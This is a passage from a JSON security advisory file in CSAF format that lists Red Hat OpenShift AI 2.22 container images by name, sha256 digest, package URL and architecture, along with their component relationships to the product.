"product_identification_helper": {
"purl": "pkg:oci/odh-modelmesh-serving-controller-rhel9@sha256%3A4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594518"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"product_id": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-modelmesh-rhel9@sha256%3Aa3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594760"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"product_id": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-notebook-controller-rhel9@sha256%3Ae940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609614"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"product_id": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-operator-bundle@sha256%3Abd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669970"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"product_id": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-rhel9-operator@sha256%3Aa54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669148"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"product_id": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-training-operator-rhel9@sha256%3A251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764595822"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"product_id": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-trustyai-service-operator-rhel9@sha256%3A3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1763639678"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64",
"product_id": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-trustyai-service-rhel9@sha256%3A51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764596318"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"product": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"product_id": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odh-dashboard-rhel9@sha256%3Abbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259?arch=ppc64le\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764637896"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"product_id": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-controller-rhel9@sha256%3Af43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773?arch=ppc64le\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764665999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"product": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"product_id": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odh-rhel9-operator@sha256%3A67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda?arch=ppc64le\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669148"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"product": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"product_id": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odh-dashboard-rhel9@sha256%3A3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b?arch=s390x\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764637896"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"product_id": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-controller-rhel9@sha256%3A0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab?arch=s390x\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764665999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"product": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"product_id": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odh-rhel9-operator@sha256%3A8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d?arch=s390x\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669148"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"product": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"product_id": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odh-dashboard-rhel9@sha256%3Afe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926?arch=arm64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764637896"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"product_id": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-controller-rhel9@sha256%3A0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667?arch=arm64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764665999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"product": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"product_id": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odh-rhel9-operator@sha256%3Ab8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e?arch=arm64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669148"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x"
},
"product_reference": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le"
},
"product_reference": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64"
},
"product_reference": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x as a component of Red Hat OpenShift AI 2.22",
